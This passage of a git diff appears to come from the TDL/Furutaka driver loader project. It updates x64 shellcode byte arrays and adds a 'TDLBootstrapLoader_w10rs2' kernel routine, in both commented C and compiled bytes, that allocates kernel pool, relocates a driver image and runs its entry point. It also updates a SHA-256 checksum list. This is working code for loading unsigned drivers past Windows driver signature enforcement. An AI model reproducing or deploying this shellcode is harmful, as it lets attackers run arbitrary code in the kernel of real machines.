0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48, + 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F, + 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00, + 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, + 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C, + 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, + 0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3 +}; + + +/* +* TDLBootstrapLoader_w10rs2 +* +* Purpose: +* +* Main part of shellcode used to execute driver code since w10rs2. +* +*/ +/* +void TDLBootstrapLoader_w10rs2( + PfnExAllocatePoolWithTag ExAllocatePoolWithTag +) +{ + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH; + + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + PfnDriverEntry DriverEntry; + + ULONG isz = popth->SizeOfImage; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint); + DriverEntry(); +} +*/ + +static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = { + 0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50, + 0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, + 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D, + 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10, + 0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05, + 0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE, + 0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00, + 0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72, + 0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, + 0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48, + 0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF, + 0xE0 }; diff --git a/TDL.sha256 b/TDL.sha256 index 8a8ffcf..fd98132 100644 --- a/TDL.sha256 +++ b/TDL.sha256 @@ -1,32 +1,32 @@ -c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys -4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln -01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj +a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys +f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys +bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln +d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user -da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln -2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj +4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln +f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user -a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c -cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h +1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c +f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln -16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj +656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user -1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h -c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc -f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc +6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h